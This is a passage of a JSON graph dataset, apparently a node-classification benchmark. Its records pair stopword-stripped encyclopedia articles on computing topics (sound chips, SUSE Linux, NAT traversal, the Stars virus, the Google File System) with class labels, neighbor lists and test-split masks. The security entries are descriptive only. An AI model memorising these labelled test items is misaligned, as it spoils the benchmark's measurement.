reviewer eminent jazz player nowiki /nowiki pat metheny said sounded like john coltrane think best compliment far atari 7800 version one rare releases system use pokey additional sound chip sample ballblazer music commodore 64 version computer gaming world stated quick intense ballblazer squeezes atari 400/800 game 've ever seen ... spectacular graphics info rated ballblazer four stars five stating undoubtedly fastest game available 64 recommending gamers strobe-like reflexes zzap 64 gave enthusiastic review commodore 64 version game criticism weak sound effects overall rating 98 game described best sports simulation hit 64 yet",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 3788,
    "label": 3,
    "text": "General_Instrument_AY-3-8910:general instrument ay-3-8910 ay-3-8910 3-voice programmable sound generator psg designed general instrument 1978 initially use 16-bit cp1610 one pic1650 series 8-bit microcomputers ay-3-8910 variants used many arcade games—konami gyruss contains five—and pinball machines well sound chip intellivision vectrex video game consoles amstrad cpc oric-1 colour genie elektor tv games computer msx later zx spectrum home computers also used mockingboard cricket sound cards apple ii speech/sound cartridge trs-80 color computer general instrument spinoff microchip technology 1987 chip sold years microchip brand instead also produced license yamaha minor modifications i.e selectable clock divider pin double-resolution double-rate volume envelope table ym2149f atari st uses version produced similar results texas instruments sn76489 market similar period chips longer made functionally-identical clones still active production unofficial vhdl description freely available use fpgas ay-3-8910 essentially state machine state set series sixteen 8-bit registers programmed 8-bit bus used addressing data toggling one external pins instance typical setup cycle would put bus address mode select register switch data mode set contents register bus implemented natively gi cpus recreated glue logic help additional interface adapter mos technology 6522 chip used much common mos technology 6502 zilog z80 cpus six registers controlled pitches produced three primary channels wavelength generate held two eight-bit registers dedicated channel value limited 12-bits reasons total 4095 register value used frequency divider 0 treated 1 different pitches another register controlled period pseudo-random noise generator total 31 different cycle times another controlled mixing noise three primary channels three additional registers controlled volume channels well turning optional envelope controls finally last three registers controlled times envelope controller setting envelope type envelope cycle time total eight envelope types include sawtooth shape triangle shape starting either maximum minimum shape also set repeat cycling effect total 65535 different cycle times set one envelope shared three channels many programmers ignored programmed envelope controllers software controlling volume directly well known trick run hardware envelope cycle times 20hz produce sawtooth pulse-wave like bass sounds although 16 registers four msb bits 8-bit bus must set factory default '0000 value selecting register incorrectly setting msb bits causes chip ignore register change general instruments take orders customized msb bits factory set '0000 chips made customize-set msb register bits allow processor control one ay chip bus e.g mockingboard sound card apple turbosound zx spectrum many new-old-stock nos chips secondary market msb bits factory set non-'0000 value non-0000 value cause significant developmental troubles designers repair technicians software must written identify correct value msb bits given chip also software must changed hardware added allow factory set msb chips used place default '0000 chips ay-3-8910 generates tones base frequencies 125 khz 4 mhz input clock 8 mhz ym2149f well beyond human perception ultrasonic range existence ultrasonic values consequence frequency-divider design order adequate resolution audible frequencies necessary overall clock rate thus output small divisors considerably higher audible range divisors 5 give entirely-ultrasonic output frequencies frequencies equivalent top octave piano keyboard defined reasonable accuracy versus accepted note values even-tempered scale nearly 1 hz precision a440 range even finely lower pitches despite high maximum frequency ability divide figure 4096 means lowest directly definable output frequency 30.6 hz roughly equal b0 third lowest note normal 88-key piano good subsonic everyday speaker systems essence chip able produce decently musical output reasonable pitches found compositions contrast sn76489 10 bits precision frequency dividers base frequency 125 khz theory lack two lowest octaves psg get around sn76489 plays tone generators one octave lower calculated frequency giving one octave less bass one octave less top compared psg 8910 silicon chip sold three different packages ay-3-8910 two general-purpose 8-bit parallel i/o ports b available 40-pin package name ay-3-8912 chip 28-pin package parallel port b simply connected pins smaller packages save cost board space 8912 widely used variant ay-3-8913 chip 24-pin package parallel ports connected users thought small reduction pin count 8912 made less interesting however i/o registers rarely used designers general instruments created fully functional 24 pin alternative released approximately 6 months 8910 8912 chips goal reduce complexity designer reduce foot print pcb yamaha ym2149f 'ssg chip pinout ay-3-8910 minor difference pin 26 could halve master clock pulled low left unconnected would replacing ay-3-8910 chip internal resistor pulls pin high master clock halved yamaha ym3439 cmos version ym2149f available two packages 40-pin dip ym3439-d 44-pin qfp ym3439-f yamaha ymz294 one newest variants ym2149 18-pin package parallel ports one sound output three channels mixed yamaha ymz284 even smaller variation ym2149 16-pin package basically ymz294 without 4/6 mhz selection pin /test pin yamaha ymz285 28-pin package features built-in pcm parallel ports two sound outputs one three ssg channels mixed pcm output toshiba t7766a compatible chip pinout ay-3-8910 used msx models winbond wf19054 jfc 95101 file kc89c72 pinout ay-3-8910 also 100 software compatible 're still production used many slot machines ay-3-8914 pinout 40-pin package ay-3-8910 except control registers chip shuffled around 'expected input a9 pin may different otherwise exactly ay-3-8910 used mattel intellivision ay-3-8930 also known ay8930 enhanced mostly-backwards-compatible version ay-3-8910 function bc2 pin changed ignored assumed 0 regardless pin state otherwise pinout ay-3-8910 variant chip adds number major enhancements separate envelopes three channels opposed one shared envelope variable duty-cycles bits precision note frequency volume envelope frequency much configurable noise generator used covox sound master sound card ibm-pc games took advantage beyond normal ay-3-8910 features chip may produced microchip technology although chip n't designed handle raw pcm data digital sound effect could simulated chip used simple based mixing function combining noise tone three channels could persuaded produce level non-zero wave altering volume level wave could shaped waveform involved cpu usage chips designed purpose mos technology 8364 paula used amiga nevertheless technique widely used platforms atari st less frequently amstrad cpc play sampled music zx spectrum 128 msx play short audio samples games thing fewer times per second order 30 300 per second allows use arbitrary software-defined envelope three channels individually takes negligible cpu power provided timer interrupt vertical blank interrupt used games turn useless envelope functionality set high frequency actually generating waveform usual square wave thanks timbre-altering effects amplitude modulation however obtain harmonic results modulating envelope must related pitch desired note granularity high-frequency envelopes set low music composed chip generally uses technique bass lines another method set one channel output idle high use volume control simple logarithmic 4-bit digital-to-analog converter however resulted poor audio quality 16 output levels logarithmically spaced sophisticated method use three channels wired together exploit non-linearity mixing produce many intermediate output levels modeled non-linearity three channels developers find suitable values exhaustive search done produced 8-bit 3×4-bit lookup table allowed 8-bit audio samples played fairly adequately though well real 8-bit d/a converter problem technique player change volume three channels single operation implies unwanted output levels two successive samples yamaha used ym2149 core produce whole family music chips used mobile phones home computers home arcade video game systems etc example ym2203 also known opn ym2149 plus fm well far advanced successors ym2608 also known opna retained previous features greatly expanded upon ym2612 also known opn2 cut-down ym2608 removed many features including ym2149 sound channels i/o ports ym2610 opnb added features retained ym2149 sound i/o ports",
    "neighbors": [
      7041,
      8198,
      5265,
      786,
      6547,
      1958,
      4518,
      7591,
      1194,
      4524,
      9006,
      2226,
      3762,
      5942,
      4666,
      7108,
      2642,
      4690,
      9947,
      7651,
      9957,
      7281,
      4082
    ],
    "mask": "None"
  },
  {
    "node_id": 3789,
    "label": 4,
    "text": "Stars_virus:stars virus stars virus computer virus infects computers running microsoft windows named discovered iranian authorities april 2011 iran claimed used tool commit espionage western researchers came believe probably thing duqu virus part stuxnet attack iran stars virus studied laboratory iran – means major vendors antivirus software access samples therefore could assess potential relation duqu stuxnet foreign computer experts say seen evidence virus even doubt actual existence iran claiming stars harmful computer systems said inflict minor damage initial stage might mistaken executable files governmental organizations second attack claimed iran stuxnet computer worm discovered july 2010 targeted industrial software equipment researchers came believe stars virus found iranian computer specialists duqu virus duqu virus keylogger embedded jpeg file since file taken keylogger portion image remained turned image taken hubble telescope showing cluster stars aftermath two galaxies colliding symantec kaspersky crysys researchers came believe duqu stars virus",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      7739,
      10309,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      10875,
      3711,
      8320,
      5764,
      2187,
      6797,
      4240,
      1688,
      2717,
      9375,
      2213,
      9904,
      9395,
      8886,
      4304,
      6360,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      2041,
      507
    ],
    "mask": "Test"
  },
  {
    "node_id": 3790,
    "label": 2,
    "text": "Core_Foundation:core foundation core foundation also called cf c application programming interface api macos ios mix low-level routines wrapper functions apple releases open-source project called cflite used write cross-platform applications macos linux windows third-party open-source implementation called opencflite also exists extends apple distribution building windows linux environments core foundation routines follow certain naming convention deal opaque objects example cfdictionaryref functions whose names begin cfdictionary objects often reference counted manually codice_1 codice_2 internally core foundation forms base types objective-c standard library well prevalent use core foundation passing primitive types data including raw bytes unicode strings numbers calendar dates uuids well collections arrays sets dictionaries numerous macos c routines primarily gui-related operating system level core foundation also provides standardized application preferences management codice_3 bundle handling run loops interprocess communication codice_4 codice_5 basic graphical user interface message dialog codice_6 parts api include utility routines wrappers around existing apis ease use utility routines perform actions file system network i/o codice_7 codice_8 codice_9 endianness translation byte order utilities examples wrapper routines include core foundation wrapper routines unix sockets cfsocket api types core foundation toll-free bridged interchangeable simple cast foundation kit counterparts example one could create codice_10 core foundation type later simply use standard c cast convert objective-c counterpart codice_11 use desired objective-c methods object one normally would core foundation plug-in model cfplugin based microsoft component object model",
    "neighbors": [
      10755,
      9732,
      4615,
      1549,
      10765,
      5647,
      7697,
      1042,
      11289,
      9762,
      6186,
      6700,
      4657,
      1074,
      9784,
      8253,
      576,
      9802,
      8783,
      5713,
      4180,
      3670,
      10838,
      4184,
      2141,
      4702,
      2146,
      9826,
      2149,
      5733,
      8806,
      3691,
      8303,
      6771,
      2676,
      6264,
      2686,
      6783,
      7806,
      9343,
      10878,
      3719,
      10888,
      8842,
      11402,
      6797,
      8852,
      1686,
      7318,
      5784,
      1177,
      4251,
      3228,
      2207,
      1699,
      11430,
      171,
      5292,
      8877,
      1710,
      2735,
      3248,
      3766,
      2232,
      9912,
      4283,
      7869,
      9406,
      1729,
      6849,
      713,
      9418,
      7378,
      3286,
      9430,
      3289,
      3293,
      4318,
      10470,
      231,
      2282,
      9451,
      1772,
      4844,
      2288,
      2804,
      7928,
      8441,
      7422,
      11521,
      2819,
      1796,
      1290,
      9999,
      784,
      10512,
      9490,
      4888,
      11037,
      5921,
      10023,
      811,
      3371,
      4399,
      10036,
      823,
      9529,
      2363,
      1852,
      2365,
      2366,
      9022,
      1346,
      10562,
      4933,
      838,
      9035,
      2388,
      1878,
      6495,
      9063,
      4457,
      10602,
      3948,
      11629,
      10608,
      6023,
      6539,
      9100,
      5521,
      1428,
      9109,
      11674,
      3483,
      1439,
      2979,
      9123,
      11173,
      8109,
      2492,
      446,
      7614,
      4544,
      2502,
      456,
      1482,
      6093,
      7118,
      464,
      6608,
      8662,
      9174,
      11223,
      3035,
      4571,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      10221,
      7154,
      5619,
      11257,
      7163,
      2045,
      6654
    ],
    "mask": "Test"
  },
  {
    "node_id": 3791,
    "label": 2,
    "text": "SUSE_Linux:suse linux suse linux computer operating system built top free open source linux kernel distributed system application software open source projects suse linux german origin basically acronym “ software und system-entwicklung ” software systems development mainly developed europe first version appeared early 1994 making suse one oldest existing commercial distributions known yast configuration tool novell bought suse suse brands trademarks 2003 novell one founding members open invention network decided make community important part development process opening widely distribution development outside contributors 2005 creating opensuse distribution opensuse project novell employed 500 developers working suse 2004 27 april 2011 novell suse acquired attachmate group made suse independent business unit later october 2014 entire attachmate group including suse acquired british firm micro focus international suse continues operate independent business unit 2 july 2018 announced micro focus would sell suse blitz 18-679 gmbh subsidiary eqt partners 2.535 billion gesellschaft für software und system entwicklung mbh lit company software system development founded 2 september 1992 nuremberg germany roland dyroff thomas fehr burchard steinbild hubert mantel three founders still mathematics students university fehr already graduated working software engineer original idea company would develop software function advisory unix group according mantel group decided distribute linux offering support name founding s.u.s.e chosen german acronym software und system-entwicklung meaning software systems development full name never used however company known s.u.s.e shortened suse october 1998 2003 capitalized suse official logo current mascot distribution veiled chameleon officially named geeko portmanteau gecko geek following competition company name geeko logo brand evolved time reflect name changes company started service provider among things regularly released software packages included softlanding linux system sls defunct slackware also printed unix/linux manuals offered technical assistance third party products suse initially used characteristics managed suse different fashions building distribution linux s.u.s.e used first slackware 1992 jurix distribution defunct 1996 starting point created florian la roche joined s.u.s.e team began develop yast installer configuration tool would become central point distribution 1996 first distribution name s.u.s.e linux published s.u.s.e linux 4.2 version number caused much discussion version 1.1 using number 4.2 intentional reference answer ultimate question life universe everything hitchhiker guide galaxy science fiction novels english writer douglas adams yast first version number 0.42 similar reference time suse linux incorporated many aspects red hat linux rpm package manager file structure s.u.s.e became largest linux distributor germany 1997 suse llc established direction president managing partner james gray oakland california enabled company develop linux markets americas asia red hat ubiquitous united states suse linux continued grow germany well nordic countries finland sweden october 1998 name changed officially suse without dots linus torvalds creator linux kernel used fairly often suse entered uk 1999 2001 company forced reduce staff significantly order survive 4 november 2003 novell announced would acquire suse linux ag 210 million acquisition finalized january 2004 move reach business audience effectively suse introduced suse linux enterprise server 2001 months novell purchase changed company name suse linux suse name acronym according j. philips novell corporate technology strategist asia pacific region novell would medium term alter way suse developed novell annual brainshare conference 2004 first time computers run suse linux announced proprietary suse administration program yast2 would released gpl license 4 august 2005 novell announced suse professional series would become open launch opensuse project community software always open source opensuse opened development process allowing developers users test develop previously development work accomplished in-house suse version 10.0 first version offered public beta testing suse linux 10.0 included open source proprietary applications retail boxed-set editions part change yast online update server access became free suse linux users also first time gnome desktop upgraded equal status traditional kde november 2005 suse founder hubert mantel announced resignation company stated novell acquisition changed suse beyond expectations believe company founded 13 years earlier resignation apparently stemmed dispute implementation ximian products gnome-based default desktop environment linux distribution re-joined year later 3 november 2006 renewed 25 july 2011 novell signed agreement microsoft covering improvement suse ability interoperate microsoft windows cross-promotion/marketing products patent cross-licensing agreement considered controversial free software community 22 november 2010 novell announced agreed acquisition attachmate group 2.2 billion attachmate group plans operate novell two units suse becoming stand-alone business anticipates change relationship suse business opensuse project result transaction u.s. department justice announced order proceed first phase acquisition certain patents patent applications novell inc. cptn holdings llc owners would alter original agreements address department antitrust concerns department said originally proposed deal would jeopardize ability open source software linux continue innovate compete development distribution server desktop mobile operating systems well middleware virtualization products stipulations regarding licensing patents acquisition completed 27 april 2011 subsequently 23 july 2011 attachmate group launched new website suse business 20 november 2014 attachmate group merged micro focus form micro focus group suse operated separate business unit dedicated product portfolio 2 july 2018 announced micro focus would sell suse business segment eqt partners 2.535 billion suse provides thirteen-year product life cycle suse linux enterprise 11 12 detailed eol eos eoxs end-of-extended-support information see suse linux available two brands opensuse suse linux enterprise opensuse free community distribution driven opensuse project includes latest bleeding edge linux technologies designed home users enthusiasts suse linux enterprise suse tested certified open-source solution major enterprises opensuse freely available community project releases versions comparatively frequent basis generally uses latest versions various open source projects includes suse linux enterprise suse commercial edition suse releases much less frequently enabling offer support effectively enterprise production deployments certified wide variety enterprise applications offers number special enterprise features including high availability point sale extensions suse historically uses heavily-tested subset packages opensuse linux basis suse linux enterprise suse offers suse linux enterprise server suse linux enterprise desktop focuses packages fit specific purpose example suse linux enterprise desktop include apache web server suse linux enterprise server include xgl/compiz contrast opensuse separate distributions server desktop tablets rather repositories contain needed software use installation patterns accomplish opensuse driven opensuse project community sponsored suse develop maintain suse linux components equivalent historic suse linux professional acquisition suse linux novell suse decided make community central development process theoretical development cycle 8 months lifetime duration critical updates 18 months date release fully freely available immediate download opensuse sixth popular linux distribution 2013 fourth popular 2014 according distrowatch suse develops multiple products enterprise business line business products target corporate environments higher life cycle 10 years extendable 13 longer development cycle 6 18 months guarantee stability potential expense development speed technical support certification independent hardware software vendors suse linux enterprise products available sale updates fees suse linux enterprise fewer packages opensuse distribution differences desktop applications suited consumers business enterprise products installed using linux kernel novell open enterprise server oes uses suse linux enterprise server platform product also known oes-linux suse linux enterprise included vmware vsphere licensing june 25 2014 'free noted suse partners website suse suse studio product web interface built using ruby rails opensuse kiwi open build service tools allowed users put together custom linux distribution graphically generate output including large variety virtual machine disk images suse studio merged open build service resulting project renamed suse studio express september 2017",
    "neighbors": [
      514,
      6153,
      3594,
      15,
      6675,
      5142,
      7204,
      9253,
      11305,
      4145,
      10804,
      56,
      5689,
      59,
      4673,
      8772,
      3142,
      9799,
      1110,
      9827,
      3685,
      10860,
      2671,
      9839,
      9332,
      11388,
      2689,
      2179,
      2693,
      8837,
      9353,
      657,
      5273,
      10394,
      10397,
      673,
      3745,
      5800,
      3245,
      7854,
      2738,
      4790,
      4282,
      8907,
      6352,
      5860,
      4841,
      6890,
      7913,
      5356,
      8938,
      7920,
      9461,
      6393,
      11513,
      8957,
      7941,
      1291,
      7435,
      10511,
      2321,
      4887,
      10530,
      10022,
      7983,
      823,
      3903,
      9539,
      2375,
      5451,
      4437,
      863,
      865,
      2914,
      9064,
      7020,
      7534,
      10096,
      9074,
      5492,
      6521,
      3976,
      905,
      10127,
      912,
      3487,
      7584,
      10149,
      6579,
      439,
      9655,
      4039,
      8157,
      9693,
      6625,
      485,
      5096,
      9197,
      8177,
      1522
    ],
    "mask": "Test"
  },
  {
    "node_id": 3792,
    "label": 4,
    "text": "NAT_traversal:nat traversal network address translator traversal computer networking technique establishing maintaining internet protocol connections across gateways implement network address translation nat nat traversal techniques required many network applications peer-to-peer file sharing voice ip nat devices allow use private ip addresses private networks behind routers single public ip address facing internet internal network devices communicate hosts external network changing source address outgoing requests nat device relaying replies back originating device leaves internal network ill-suited hosting servers nat device automatic method determining internal host incoming packets destined problem general web access email however applications peer-to-peer file sharing voip services video game consoles require clients servers well incoming requests easily correlated proper internal host furthermore many types services carry ip address port number information application data potentially requiring substitution deep packet inspection network address translation technologies standardized result methods used nat traversal often proprietary poorly documented many traversal techniques require assistance servers outside masqueraded network methods use server establishing connection others based relaying data increases bandwidth requirements latency detrimental real-time voice video communications nat traversal techniques usually bypass enterprise security policies enterprise security experts prefer techniques explicitly cooperate nat firewalls allowing nat traversal still enabling marshalling nat enforce enterprise security policies ietf standards based security model realm-specific ip rsip middlebox communications midcom following nat traversal techniques available recent proliferation symmetric nats reduced nat traversal success rates many practical situations mobile public wifi connections hole punching techniques stun ice fail traversing symmetric nats without help relay server practiced turn techniques traverse symmetric nats attempting predict next port opened nat device discovered 2003 yutaka takeda panasonic communications research laboratory 2008 researchers waseda university port prediction techniques effective nat devices use known deterministic algorithms port selection predictable yet non-static port allocation scheme uncommon large scale nats used 4g lte networks therefore port prediction largely ineffective mobile broadband networks ipsec virtual private network clients use nat traversal order encapsulating security payload packets traverse nat ipsec uses several protocols operation must enabled traverse firewalls network address translators many routers provide explicit features often called ipsec passthrough windows xp nat traversal enabled default windows xp service pack 2 disabled default case vpn server also behind nat device rare controversial security issue ipsec nat-t patches also available windows 2000 windows nt windows 98 nat traversal ipsec may used enable opportunistic encryption traffic systems nat traversal allows systems behind nats request establish secure connections demand hosted nat traversal hnt set mechanisms including media relaying latching used intermediaries ietf advises using latching internet recommends ice security reasons",
    "neighbors": [
      4229,
      10889,
      4490,
      1164,
      1036,
      14,
      6541,
      1942,
      10522,
      10908,
      5405,
      3742,
      10271,
      2985,
      2093,
      7214,
      10417,
      7859,
      6964,
      3770,
      8640,
      11073,
      8386,
      3011,
      708,
      3150,
      6351,
      6991,
      6993,
      7761,
      5972,
      3676,
      5085,
      3428,
      3813,
      9318,
      755,
      1908,
      4084,
      5749,
      8308,
      9332,
      10874
    ],
    "mask": "Test"
  },
  {
    "node_id": 3793,
    "label": 3,
    "text": "RetroArch:retroarch retroarch free open-source cross-platform front-end emulators game engines video games media players applications reference implementation libretro api designed fast lightweight portable without dependencies licensed gnu gplv3 retroarch runs programs converted dynamic libraries called libretro cores using several user interfaces command-line interface graphical user interfaces gui optimized gamepads famous one called xmb clone sony xmb several input audio video drivers plus sophisticated features like dynamic rate control audio filters multi-pass shaders netplay gameplay rewinding cheats etc retroarch ported many platforms run several pc operating systems windows macos linux home consoles playstation 3 xbox 360 wii u etc handheld consoles playstation vita nintendo 3ds etc smartphones android ios etc embedded systems raspberry pi odroid etc even web browsers using emscripten compiler formerly known ssnes initially based pseudonymous programmer byuu libretro predecessor libsnes began development 2010 hans-kristian themaister arntzen committing first change github intended replacement bsnes qt-based interface grew support emulation cores april 21 2012 ssnes officially renamed retroarch reflect change direction retroarch version 1.0.0.0 released january 11 2014 time available 7 distinct platforms february 16 2016 retroarch became one first ever applications implement support vulkan graphics api done day api official release day november 27 2016 libretro team announced alongside lakka libreelec-based retroarch operating system retroarch would patreon crowdfunding platform allow providing bounties developers fix specific software bugs cover costs matchmaking servers december 2016 gogames – company contracted video game developer publisher sega – approached retroarch developers intention using software sega forever project ultimately cooperation come fruition due licensing disagreements april 2018 input lag compensation added libretro team plans release retroarch onto steam free download integrating steamworks features platform july 2019 first major dedicated emulation title released platform major features include retroarch run libretro core retroarch available many platforms availability specific core varies per platform non-exhaustive table systems available retroarch project core based retroarch praised number systems games play single interface criticized difficult configure due extensive number options available user time praised advanced features possesses android praised fact overlays customized expandability libretro cores supports compatibility several usb bluetooth controller peripherals addition app free ads tyler loch writing ars technica said retroarch 'input lag compensation mode arguably biggest improvement experience retro gaming community yet seen",
    "neighbors": [
      641,
      6403,
      5380,
      8970,
      6797,
      921,
      6311,
      9006,
      7983,
      823,
      1849,
      8640,
      3522,
      7234,
      8523,
      10316,
      2901,
      11221,
      8937,
      5356,
      5612,
      1530,
      8700,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 3794,
    "label": 4,
    "text": "Duplicity_(software):duplicity software duplicity software suite provides encrypted digitally signed versioned remote backup files requiring little remote server released terms gnu general public license gpl duplicity free software duplicity devises scheme first archive complete full backup subsequent incremental backups add differences latest full incremental backup chains consisting full backup series incremental backups recovered point time incremental steps taken incremental backups missing incremental backups following reconstructed using gnupg librsync tar rdiff transmit data backup repository use ssh/scp/sftp local file access rsync ftp amazon s3 google cloud storage rackspace cloud files others duplicity works best unix-like operating systems linux bsd mac os x though used windows cygwin currently duplicity supports deleted files full unix permissions directories symbolic links fifos device files hard links",
    "neighbors": [
      2050,
      6280,
      1801,
      11410,
      5397,
      6565,
      7983,
      1844,
      2487,
      823,
      9025,
      11201,
      7364,
      1358,
      5969,
      10341,
      5482,
      8554,
      5612
    ],
    "mask": "Test"
  },
  {
    "node_id": 3795,
    "label": 6,
    "text": "Google_File_System:google file system google file system gfs googlefs proprietary distributed file system developed google provide efficient reliable access data using large clusters commodity hardware last version google file system codenamed colossus released 2010 gfs enhanced google core data storage usage needs primarily search engine generate enormous amounts data must retained google file system grew earlier google effort bigfiles developed larry page sergey brin early days google still located stanford files divided fixed-size chunks 64 megabytes similar clusters sectors regular file systems extremely rarely overwritten shrunk files usually appended read also designed optimized run google computing clusters dense nodes consist cheap commodity computers means precautions must taken high failure rate individual nodes subsequent data loss design decisions select high data throughputs even comes cost latency gfs cluster consists multiple nodes nodes divided two types one master node large number chunkservers file divided fixed-size chunks chunkservers store chunks chunk assigned globally unique 64-bit label master node time creation logical mappings files constituent chunks maintained chunk replicated several times throughout network default replicated three times configurable files high demand may higher replication factor files application client uses strict storage optimizations may replicated less three times order cope quick garbage cleaning policies master server usually store actual chunks rather metadata associated chunks tables mapping 64-bit labels chunk locations files make mapping files chunks locations copies chunks processes reading writing particular chunk taking snapshot chunk pursuant replicate usually instigation master server due node failures number copies chunk fallen beneath set number metadata kept current master server periodically receiving updates chunk server heart-beat messages permissions modifications handled system time-limited expiring leases master server grants permission process finite period time process granted permission master server modify chunk modifying chunkserver always primary chunk holder propagates changes chunkservers backup copies changes saved chunkservers acknowledge thus guaranteeing completion atomicity operation programs access chunks first querying master server locations desired chunks chunks operated i.e outstanding leases exist master replies locations program contacts receives data chunkserver directly similar kazaa supernodes unlike file systems gfs implemented kernel operating system instead provided userspace library google file system implement posix api files organized hierarchically directories identified pathnames file operations create delete open close read write supported supports record append allows multiple clients append data file concurrently atomicity guaranteed deciding benchmarking results used relatively small number servers 15 file system achieves reading performance comparable single disk 80–100 mb/s reduced write performance 30 mb/s relatively slow 5 mb/s appending data existing files authors present results random seek time master node directly involved data reading data passed chunk server directly reading client read rate increases significantly number chunk servers achieving 583 mb/s 342 nodes aggregating large number servers also allows big capacity somewhat reduced storing data three independent locations provide redundancy",
    "neighbors": [
      4096,
      5120,
      2564,
      6156,
      6669,
      3598,
      8719,
      3600,
      10257,
      7700,
      6677,
      5142,
      8214,
      9236,
      3611,
      9244,
      9249,
      9762,
      5158,
      10284,
      3633,
      5170,
      7225,
      11323,
      8772,
      4683,
      11343,
      3664,
      1109,
      8285,
      2658,
      4708,
      9836,
      7789,
      8821,
      9333,
      119,
      6263,
      9335,
      9343,
      7816,
      7818,
      654,
      5262,
      6800,
      2193,
      2194,
      11408,
      2197,
      2199,
      10393,
      8858,
      11419,
      7841,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      1203,
      2230,
      5816,
      1212,
      8380,
      7359,
      3265,
      196,
      3269,
      3782,
      10951,
      9420,
      10445,
      7378,
      4819,
      8402,
      8404,
      728,
      1240,
      8410,
      6365,
      8413,
      6367,
      9949,
      739,
      7907,
      8938,
      236,
      1263,
      3312,
      3826,
      2291,
      9970,
      246,
      7926,
      3834,
      3836,
      3326,
      8446,
      3328,
      5892,
      11012,
      8455,
      2314,
      8461,
      11535,
      6416,
      1810,
      6935,
      10009,
      11033,
      10525,
      798,
      287,
      288,
      1825,
      6434,
      10016,
      4901,
      5413,
      3368,
      4907,
      9004,
      302,
      7983,
      6961,
      6963,
      1844,
      5431,
      6970,
      2875,
      10045,
      11072,
      3909,
      11590,
      11592,
      2378,
      4431,
      9039,
      3409,
      5969,
      346,
      2395,
      3931,
      2397,
      10596,
      2407,
      10087,
      5483,
      11638,
      6519,
      376,
      11128,
      890,
      7548,
      10111,
      1409,
      7554,
      4995,
      9610,
      8075,
      7565,
      6545,
      5522,
      1427,
      5524,
      5013,
      10645,
      1435,
      11675,
      11676,
      414,
      2974,
      7070,
      2978,
      1959,
      10151,
      3499,
      4012,
      7595,
      1454,
      6062,
      8114,
      7603,
      8631,
      1464,
      1978,
      6591,
      8643,
      4044,
      4048,
      7126,
      2015,
      1509,
      9189,
      6632,
      5100,
      7663,
      9712,
      11256,
      2555,
      3582
    ],
    "mask": "Test"
  },
  {
    "node_id": 3796,
    "label": 4,
    "text": "Vulnerability_assessment_(computing):vulnerability assessment computing vulnerability assessment process defining identifying classifying security holes information technology systems attacker exploit vulnerability violate security system known vulnerabilities authentication vulnerability authorization vulnerability input validation vulnerability deploying system first must go series vulnerability assessments ensure build system secure known security risks new vulnerability discovered system administrator perform assessment discover modules vulnerable start patch process fixes place another assessment run verify vulnerabilities actually resolved cycle assess patch re-assess become standard method many organizations manage security issues primary purpose assessment find vulnerabilities system assessment report conveys stakeholders system secured vulnerabilities intruder gained access network consisting vulnerable web servers safe assume gained access systems well assessment report security administrator able determine intrusion occurred identify compromised assets take appropriate security measures prevent critical damage system depending system vulnerability assessment many types level host assessment looks system-level vulnerabilities insecure file permissions application level bugs backdoor trojan horse installations requires specialized tools operating system software packages used addition administrative access system tested host assessment often costly term time thus used assessment critical systems tools like cops tiger popular host assessment network assessment one assess network known vulnerabilities locates systems network determines network services use analyzes services potential vulnerabilities process require configuration changes systems assessed unlike host assessment network assessment requires little computational cost effort vulnerability assessment penetration testing two different testing methods differentiated basis certain specific parameters",
    "neighbors": [
      5636,
      6473,
      3887,
      7887,
      8399,
      5490,
      11567,
      4600,
      413
    ],
    "mask": "Test"
  },
  {
    "node_id": 3797,
    "label": 2,
    "text": "MagiC:magic magic third party multitasking-capable tos-compatible operating system atari st range computers including newer clone machines also variants run part magicmac magicpc emulation environments kernel magic largely written hand-coded motorola 68000 assembly language offers magic originally released mag x 1992 time tos featured limited multitasking form desk accessory programs simple programs accessed desk menu multitasked using cooperative task switching contrast magic offered preemptive multitasking giving ability run multiple well-behaved gem applications well non-graphical software name changed mag x magic release version 3.0 added many improvements significant amount mint compatibility version 4.0 added support atari falcon finally 1995 version 5.0 brought significant addition loadable file system support along implementation vfat long file names number improvements gemdos layer including threads signals latest atari version 6.2 atari slow improve hardware systems apparent mid late 1990s apple mac superior hardware platform given two shared similar user interface mac logical upgrade many atari users 1995 variant magic known magicmac released allowing atari users run well-behaved software much newer mac hardware later versions magicmac offered improved integration mac os allowed well-behaved atari software access native graphics modes offered host machine addition emulations standard atari screen modes release mac os x original versions magicmac would longer run operated low level within mac os order function 2001 new version magicmac magicmacx released use mac os x updated 2004 recently september 2009 universal binary running natively powerpc intel macs summer 1996 another version released magicpc time allowing atari users run software top microsoft windows magic versions 6.0 6.2 released use clone machines manufactured medusa computer systems late 1990s include significant enhancements support fat32 increased mint compatibility support newer processors hardware found clone systems magic implementation gem desktop greatly enhanced version included original tos systems initially named magxdesk changing magicdesk release magic 3.0 offered features missing original desktop including unlike gem desktop magicdesk built magic instead could launched application startup possible start magic shell popular alternatives including jinnee thing",
    "neighbors": [
      2290,
      6100,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 3798,
    "label": 3,
    "text": "Slot_1:slot 1 slot 1 refers physical electrical specification connector used intel microprocessors including pentium pro celeron pentium ii pentium iii single dual processor configurations implemented intel switched back traditional socket interface socket 370 1999 introduction pentium ii cpu need greater access testing made transition socket slot necessary previously pentium pro intel combined processor cache dies socket 8 package connected full-speed bus resulting significant performance benefits unfortunately method required two components bonded together early production process testing possible result single tiny flaw either die made necessary discard entire assembly causing low production yield high cost intel subsequently designed circuit board cpu cache remained closely integrated mounted printed circuit board called single-edged contact cartridge secc cpu cache could tested separately final assembly package reducing cost making cpu attractive markets high-end servers cards could also easily plugged slot 1 thereby eliminating chance pins typical cpu bent broken installing socket form factor used slot 1 5-inch-long 242-contact edge connector named sc242 prevent cartridge inserted wrong way slot keyed allow installation one direction sc242 later used amd slot well two slots identical mechanically electrically incompatible discourage slot users trying install slot 1 cpu connector rotated 180 degrees slot motherboards new slot 1 intel added support 